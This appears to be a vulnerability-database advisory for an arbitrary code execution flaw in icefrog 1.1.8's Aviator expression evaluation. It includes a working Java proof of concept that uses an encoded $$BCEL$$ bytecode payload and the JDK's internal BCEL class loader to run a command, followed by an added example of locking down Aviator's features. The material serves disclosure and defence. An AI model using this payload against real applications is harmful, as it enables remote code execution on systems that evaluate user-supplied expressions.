| Title | icefrog v1.1.8 Has an Arbitrary Code Execution vulnerability |
|---|
| Description | IceFrog is a suite of core and extended libraries that includes utility classes, collections, I/O classes and much more, in the same vein as Guava, Apache Commons and Hutool.
In icefrog 1.1.8, an expression string passed to `ExpressionUtil.eval` is handed to the Aviator engine for parsing and evaluation. Aviator expressions may instantiate objects directly with `new` and call public static methods (non-public static methods cannot be called), and that is enough: `Class.forName` with a `$$BCEL$$`-prefixed class name and the JDK-internal BCEL class loader (`com.sun.org.apache.bcel.internal.util.ClassLoader`) decodes and defines attacker-supplied bytecode, giving remote code execution. The gadget only works on JDKs that still bundle that class loader (older Java 8 builds), and the command in the PoC is macOS-specific.
When an application lets a user control an expression parsed by icefrog, the Aviator template engine is triggered and the user's bytecode runs, i.e. arbitrary code execution.
The test code is below (the submitter's PoC, wrapped in a class so it compiles; the `$$BCEL$$` payload string is reproduced verbatim):

```java
import com.whaleal.icefrog.extra.expression.ExpressionUtil;

public class IcefrogAviatorPoc {
    public static void main(String[] args) {
        // Expression handed to icefrog, which forwards it to the Aviator engine.
        // Class.forName(name, true, bcelLoader) makes the BCEL loader decode and
        // define the class encoded after "$$BCEL$$" (initialize=true also runs its
        // static initializer); the expression then calls exec(...) on the result
        // with the command to run.
        String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );";
        // Evaluating the expression is the trigger; no environment map is needed.
        final Object eval = ExpressionUtil.eval(exp, null);
        System.out.println(eval);
    }
}
```
|
|---|
| Source | ⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md |
|---|
| User | dreamfly (UID 37785) |
|---|
| Submitted | 15/06/2023 08:58 AM (3 years ago) |
|---|
| Moderation | 18/06/2023 09:49 AM (3 days later) |
|---|
| Status | Approved |
|---|
| VulDB Entry | 231804 [whaleal IceFrog 1.1.8 Aviator Template Engine privilege escalation] |
|---|
| Points | 20 |
|---|
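The PoC relies on two Aviator features reachable from an expression string: `new` on an arbitrary class and static method calls (`Class.forName`). The block below is an added example of the hardening a practitioner would apply when untrusted expressions must be evaluated; it is not code from icefrog or from the advisory. It drives Aviator directly rather than through icefrog's `ExpressionUtil`, and it assumes the Aviator 5.x API (`AviatorEvaluator.newInstance()`, `Options.FEATURE_SET` with `Feature.asSet(...)`, `Options.ALLOWED_CLASS_SET`, `compile(String, boolean)`); the hostile string keeps the PoC's shape with the BCEL blob elided, so it never defines a class even on a JDK that still ships the BCEL loader.

```java
// Added example, not icefrog's or the advisory's code. Assumes Aviator 5.x
// (com.googlecode.aviator) with Options.FEATURE_SET, Feature.asSet(...) and
// Options.ALLOWED_CLASS_SET available.
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

public class LockedDownAviator {

    /** Evaluator with no `new`, no static method/field access and no assignment. */
    static AviatorEvaluatorInstance lockedDown() {
        AviatorEvaluatorInstance ev = AviatorEvaluator.newInstance();
        // Empty feature set: plain arithmetic, string and logic expressions only.
        // Feature.NewInstance, Feature.StaticMethods and Feature.Assignment are
        // exactly what the PoC needs for `new com.sun...ClassLoader()`,
        // `Class.forName(...)` and `c=...`.
        ev.setOption(Options.FEATURE_SET, Feature.asSet());
        // Belt and braces: even if a feature were re-enabled later, no class may
        // be referenced from an expression (assumed Options.ALLOWED_CLASS_SET).
        ev.setOption(Options.ALLOWED_CLASS_SET, Collections.<Class<?>>emptySet());
        return ev;
    }

    /** Evaluate an untrusted expression; returns null when Aviator rejects it. */
    static Object evalUntrusted(AviatorEvaluatorInstance ev, String exp, Map<String, Object> env) {
        try {
            // compile() fails before anything executes when a disabled feature is used
            return ev.compile(exp, false).execute(env);
        } catch (RuntimeException e) { // Aviator's exceptions are unchecked
            System.err.println("rejected: " + e.getClass().getSimpleName() + ": " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        AviatorEvaluatorInstance ev = lockedDown();
        Map<String, Object> env = new HashMap<>();
        env.put("b", "c"); // constructed sample input

        // Benign expression still works.
        System.out.println(evalUntrusted(ev, "'a' + b", env));

        // Same shape as the PoC with the BCEL blob elided: does not compile,
        // so no class is ever handed to a class loader.
        String hostile = "'a'+(c=Class.forName(\"$$BCEL$$...\",true,"
                + "new com.sun.org.apache.bcel.internal.util.ClassLoader()))";
        System.out.println(evalUntrusted(ev, hostile, env));
    }
}
```

The important design point is that the restriction is applied at compile time on a dedicated evaluator instance, not by string-matching `$$BCEL$$` or `Class.forName` in the input: the Aviator global evaluator keeps its default feature set, so every code path that evaluates untrusted input has to go through the locked-down instance.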